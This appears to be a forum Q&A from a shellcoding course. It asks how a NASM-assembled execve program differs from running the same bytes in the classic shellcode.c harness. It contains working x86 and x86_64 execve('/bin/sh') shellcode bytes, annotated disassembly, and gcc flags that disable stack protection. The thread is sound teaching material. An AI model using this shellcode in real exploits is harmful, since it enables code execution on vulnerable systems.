Difference between running an assembly program and running the disassembled code in shellcode.c

Question

I am currently working on 'Pentester Academy's x86_64 Assembly Language and Shellcoding on Linux' course (www.pentesteracademy.com/course?id=7). I have one simple question that I can't quite figure out: what is the exact difference between running an assembly program that has been assembled and linked with NASM and ld vs. running the same disassembled program in the classic shellcode.c program (written below). Why use one method over the other?

As an example, when following the first method, I use the commands :

nasm -f elf64 -o execve_stack.o execve_stack.asm
ld -o execve_stack execve_stack.o
./execve_stack

When using the second method, I insert the disassembled shellcode in the shellcode.c program:

#include 
#include 

unsigned char code[] = \
"\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";

int main(void) {

    printf("Shellcode length: %d
", (int)strlen(code));
    int (*ret)() = (int(*)())code;
    ret();

    return 0;
}

... and use the commands:

gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
./shellcode

I have analyzed both programs in GDB and found that addresses stored in certain registers differ. I have also read the answer to the following question (C code explanation), which helped me understand the way the shellcode.c program works. Having said that, I still don't fully understand the exact way in which these two methods differ.

Valy · Accepted Answer

There is no theoretical difference between the two methods. In both you end up executing a bunch of assembly instructions on the processor.

The shellcode.c program is there to just demonstrate what would happen if you run the assembly defined as an array of bytes in the unsigned char code[] variable.

Why use one method over the other?

I think you don't understand the purpose of shellcodes and the reasoning behind the shellcode.c program (why it shows what happens when an arbitrary sequence of bytes you have control on is executed on the processor).

A shellcode is a small piece of assembly code that is used to exploit a software vulnerability. An attacker usually injects a shellcode into software by taking advantage of common programming errors such as buffer overflows and then tries to make the software execute that injected shellcode.

A good article showing a step-by-step tutorial on how to generate a shell by performing shellcode injection using buffer overflows can be found here.

Here is how a classic shellcode \x83\xec\x48\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 looks like in assembler:

sub esp, 72
xor eax, eax
xor edx, edx
push eax
push 0x68732f2f    ; "hs//" (/ is doubled because you need to push 4 bytes on the stack)
push 0x6e69622f    ; "nib/"
mov ebx, esp       ; EBX = address of string "/bin//sh"
push eax
push ebx
mov ecx, esp
mov al, 0xb        ; EAX = 11 (which is the ID of the sys_execve Linux system call)
int 0x80

In an x86 environment, this does an execve system call with the "/bin/sh" string as parameter.

Difference between running an assembly program and running the disassembled code in shellcode.c

Answers (1)

Related Questions